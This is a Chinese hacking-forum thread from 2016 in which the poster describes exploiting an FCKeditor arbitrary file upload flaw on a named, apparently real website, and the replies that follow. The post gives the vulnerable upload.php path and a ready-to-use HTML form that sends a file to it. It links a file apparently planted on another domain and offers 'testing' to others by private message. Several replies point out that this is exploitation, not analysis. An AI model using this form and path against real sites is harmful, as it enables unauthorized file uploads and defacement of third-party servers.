3‘server 发表于 2016-2-2 23:05:53

一次上传漏洞的分析

http://xxx552.com/
目标网站
===========================================
多出漏洞
===========================================
fck漏洞
=====================================
任意文件上传
======================================
神器漏洞扫到
========================================
common/lib/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media
=======================================================
看到这个地址,访问无回显
=======================================================
猜测是一个上传地点
=======================================================
于是自己写了一个表单上传
=======================================================

<form id="frmUpload" enctype="multipart/form-data"

action="127.0.0.1/comxmon/lib/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>

<input type="file" name="NewFile" size="50"><br>

<input id="btnUpload" type="submit" value="Upload">

</form>
===============================================================================

=========================================================================
写一首非常好听的音乐mv做黑夜吧,好久没玩黑夜了
======================================================================
找回以前的味道
===========================================================================
http://js0552.com/data/fck//1.html
=========================================================================
需要测试的朋友可以找到我微博私信我
=========================================================
www.weibo.com/webitent

浮尘 发表于 2016-2-2 23:08:56

{:2_35:}黑夜不是咋们论坛的大黑阔么

国光nice 发表于 2016-2-2 23:49:12

浮尘 发表于 2016-2-2 23:08 static/image/common/back.gif
黑夜不是咋们论坛的大黑阔么

黑夜他说他退出网络了http://www.ihonker.org//mobcent//app/data/phiz/default/00.png

Mrlin 发表于 2016-2-3 11:48:38

wuyan 发表于 2016-2-3 13:16:20

这个........,叫利用吧,怎么就分析了呢

2858489968 发表于 2016-2-3 22:04:14

这个........,叫利用吧,怎么就分析了呢

haomoon 发表于 2016-12-24 02:53:53

楼主谢谢了
页: [1]
查看完整版本: 一次上传漏洞的分析